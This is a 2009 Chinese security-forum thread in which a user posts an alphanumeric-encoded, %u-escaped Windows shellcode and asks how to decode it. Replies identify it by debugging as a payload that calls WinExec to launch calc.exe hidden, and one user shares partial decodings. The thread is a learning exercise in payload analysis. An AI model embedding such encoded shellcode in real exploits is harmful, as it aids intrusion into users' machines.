shellcode求解

显示全部楼层 · 发表于 2009-7-4 21:36:40

本人不才,获得一份shellcode无法解密,只有来坛子寻求各位卡饭帮忙了,希望可以给一个详细的解密步骤,我想学习下

%u9090%u9090%u03eb%ueb59%ue805%ufff8%uffff%u4937%u4949%u4949%u4949%u4949%u4949%u4949%u4949%u4949%u5a51%u456a%u5058%u4230%u4130%u416b%u5541%u4132%u3242%u4242%u4142%u4230%u5841%u3850%u4241%u7875%u7969%u6d6c%u3038%u6544%u7550%u7350%u6e30%u516b%u7755%u4c4c%u414b%u656c%u3355%u4348%u3831%u4c6f%u304b%u464f%u4c78%u314b%u374f%u3450%u4a41%u624b%u4e69%u666b%u6e54%u666b%u6a61%u304e%u3931%u4f50%u4c69%u6f6c%u5974%u3450%u3534%u5957%u7951%u565a%u776d%u6f71%u7832%u6b6b%u6744%u714b%u6744%u7754%u3474%u4b35%u6e55%u436b%u466f%u6544%u3851%u506b%u4c66%u564b%u306c%u4c4b%u414b%u374f%u656c%u5a51%u6c4b%u654b%u4c4c%u674b%u6871%u6e6b%u7169%u654c%u6674%u5964%u4653%u4951%u6550%u6c34%u634b%u3470%u4b70%u4b35%u5470%u3438%u6e4c%u436b%u6670%u4e6c%u626b%u7550%u4c4c%u6e6d%u536b%u3758%u4a78%u554b%u4c59%u6d4b%u6e50%u6550%u6550%u4750%u6c70%u434b%u6558%u716c%u464f%u5a51%u4156%u3070%u4d56%u6c59%u4e38%u4963%u7150%u526b%u7570%u7138%u4b6e%u4b68%u3152%u6563%u4c38%u5958%u6e6e%u746a%u714e%u4b47%u7a4f%u7047%u6363%u5251%u634c%u5553%u4550

复制代码

显示全部楼层 · 发表于 2009-7-4 21:58:57

给个源地址吧，这样不好解的

显示全部楼层 · 发表于 2009-7-4 21:59:35

启动calc.exe的shellcode

Call To WinExec from kernel32.7c81cde4
CmdLine = "calc"
ShowState = SW_HIDE

显示全部楼层 · 发表于 2009-7-5 10:13:54

上面的shellcode 用Redoce decode 5 之後出現以下代碼 Y7IIIIIIIIIIIIIIIIIQZjEXP0B0AkAAU2AB2BBBA0BAXP8ABuxiylm80DePuPs0nkQUwLLKAleU3HC18oLK0OFxLK1O7P4AJKbiNkfTnkfajN019POiLlotYP445WYQyZVmwqo2xkkDgKqDgTwt45KUnkCoFDeQ8kPfLKVl0KLKAO7leQZKlKeLLKgqhkniqLetfdYSFQIPe4lKcp4pK5KpT84LnkCpflNkbPuLLmnkSX7xJKUYLKmPnPePePGplKCXelqOFQZVAp0VMYl8NcIPqkRpu8qnKhKR1ce8LXYnnjtNqGKOzGpccQRLcSUPE
再用decode 3之後出現
\x59\x39\xD9\xD9\xD9\xD9\xD9\xD9\xD9\xD9\x4A\xE5\xD0\x42\x41\xF1\x45\x61\x12\x62\x61\x42\x48\x38\x52\x28\xE9\xAD\xB0\x25\x75\x73\x6E\xE1\x27\x8C\xF1\xA5\x63\xC3\x28\xBC\x80\xB6\xCC\x81\xC7\x34\x5A\xD2\xDE\xD6\x2E\xD6\x7A\xD0\x29\x4F\xDC\xAF\x19\x34\x75\x29\x69\xF6\xA7\x7F\x58\xDB\x27\xC1\x27\x37\x74\x1B\x3E\xF3\xB6\x25\x28\xE0\x2C\xE6\xF0\xFC\xF1\xC7\xA5\x4A\xDC\xD5\x8C\xD7\x78\xDE\xE1\xA5\x26\x19\x76\x59\x65\x2C\xD3\x34\x4B\x1B\x54\xB4\xAE\xF3\x66\x8E\xD2\x75\x8C\xBE\xE3\xB7\xCA\xE5\xDC\xDD\x6E\x65\x65\x47\x6C\xF3\xE5\xB1\xB6\x4A\x21\x30\x2D\xFC\xCE\x79\x71\xE2\x75\xF1\xAB\xCB\x11\x55\xCC\xD9\x8E\xD4\x91\x3B\x8A\x0\x53\x42\xA3\x65
再用decode 1 出現
Y9 J BA Ea 2baBH8R( %usn ' c ( 4Z . z )O 94u)i X ' '7t B> %( , J x & 9vYe, 4K BT f u neeGl J!0- yq u 1U ; SB e
請問 qianwenxiang 大大是從那裡看到
启动calc.exe的shellcode

Call To WinExec from kernel32.7c81cde4
CmdLine = "calc"
ShowState = SW_HIDE
的呢
感謝您

^^

显示全部楼层 · 发表于 2009-7-5 14:21:14

调试所得

显示全部楼层 · 发表于 2009-7-5 17:43:02

调试可得~ rec1.rar录像

显示全部楼层 · 发表于 2009-7-5 18:31:43

原帖由 qianwenxiang 于 2009-7-5 17:43 发表
调试可得~ rec1.rar录像

红字

显示全部楼层 · 发表于 2009-7-6 21:56:33

原來如此.
感謝二位大大的回答

[已鉴定] shellcode求解

回复 4楼 ryanking 的帖子

回复 4楼 ryanking 的帖子